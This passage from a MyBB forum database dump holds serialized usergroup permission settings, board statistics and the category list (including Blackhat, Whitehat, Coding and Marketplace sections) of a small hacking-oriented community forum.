1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:21;a:73:{s:3:\"gid\";s:2:\"21\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:13:\"The Marketers\";s:11:\"description\";s:193:\"We are a High Quality group all about Money Making. We post threads about Money Making methods like PPD, PPC, CPA etc. And we are not gonna post only threads but we are here to help people too.\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/grey.gif\";s:5:\"image\";s:23:\"images/ub/marketers.gif\";s:9:\"disporder\";s:2:\"18\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('stats', 'a:7:{s:10:\"numthreads\";i:1234;s:20:\"numunapprovedthreads\";i:0;s:8:\"numposts\";i:7379;s:18:\"numunapprovedposts\";i:0;s:8:\"numusers\";i:254;s:7:\"lastuid\";s:3:\"346\";s:12:\"lastusername\";s:12:\"TheBlueCat97\";}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('forums', 'a:80:{i:1;a:37:{s:3:\"fid\";s:1:\"1\";s:4:\"name\";s:7:\"General\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:1:\"1\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:6;a:37:{s:3:\"fid\";s:1:\"6\";s:4:\"name\";s:14:\"Miscellaneous \";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:1:\"6\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:10;a:37:{s:3:\"fid\";s:2:\"10\";s:4:\"name\";s:8:\"Blackhat\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"10\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:51;a:37:{s:3:\"fid\";s:2:\"51\";s:4:\"name\";s:6:\"Coding\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"51\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:22;a:37:{s:3:\"fid\";s:2:\"22\";s:4:\"name\";s:8:\"Whitehat\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"22\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:26;a:37:{s:3:\"fid\";s:2:\"26\";s:4:\"name\";s:9:\"LH Elite \";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"26\";s:9:\"disporder\";s:1:\"6\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:31;a:37:{s:3:\"fid\";s:2:\"31\";s:4:\"name\";s:8:\"Upgraded\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"31\";s:9:\"disporder\";s:1:\"7\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:57;a:37:{s:3:\"fid\";s:2:\"57\";s:4:\"name\";s:7:\"Groups \";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"57\";s:9:\"disporder\";s:1:\"8\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:70;a:37:{s:3:\"fid\";s:2:\"70\";s:4:\"name\";s:6:\"Gaming\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"70\";s:9:\"disporder\";s:1:\"9\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:32;a:37:{s:3:\"fid\";s:2:\"32\";s:4:\"name\";s:10:\"GFX Corner\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"32\";s:9:\"disporder\";s:2:\"10\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:36;a:37:{s:3:\"fid\";s:2:\"36\";s:4:\"name\";s:11:\"Marketplace\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"36\";s:9:\"disporder\";s:2:\"11\";s:6:\"active\";s:1:\"0\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:3;a:37:{s:3:\"fid\";s:1:\"3\";s:4:\"name\";s:45:\"Announcements, Feedback, Bugs and Suggestions\";s:11:\"description\";s:135:\"This is the section where LH staff announce new rules, people can suggest new ideas, report bugs & issues and leave your feedback here.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:3:\"1,3\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"150\";s:15:\"lastpostsubject\";s:45:\"Recent Downtime and Forced to change password\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:22:\"Rules for this section\";s:5:\"rules\";s:253:\"1. Only Announcements by Mods and Staff are posted here, member announcements go in the Off Topic section. 2. You are allowed to post your feedbacks and report site bugs here. 3. We have a separate section for member and staff reports and suggestions.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:28:\"1339992119_announcements.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:4;a:37:{s:3:\"fid\";s:1:\"4\";s:4:\"name\";s:12:\"Introduction\";s:11:\"description\";s:71:\"New to LH? Introduce yourself to other members and get to know others. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:3:\"1,4\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"205\";s:15:\"lastpostsubject\";s:14:\"Centagon here!\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:23:\"1339992017_Positive.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:5;a:37:{s:3:\"fid\";s:1:\"5\";s:4:\"name\";s:5:\"Staff\";s:11:\"description\";s:40:\"Private forum for all staff discussions.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:3:\"1,5\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:20:\"Request for LH staff\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:21:\"1339992183_client.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:48;a:37:{s:3:\"fid\";s:2:\"48\";s:4:\"name\";s:4:\"Mod \";s:11:\"description\";s:73:\"A section for Mod discussions. Only Mods and Admins can view this forum. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:4:\"1,48\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"61\";s:15:\"lastpostsubject\";s:23:\"We have a problem here.\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"watchman.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:19;a:37:{s:3:\"fid\";s:2:\"19\";s:4:\"name\";s:4:\"Junk\";s:11:\"description\";s:35:\"A section for all unwanted 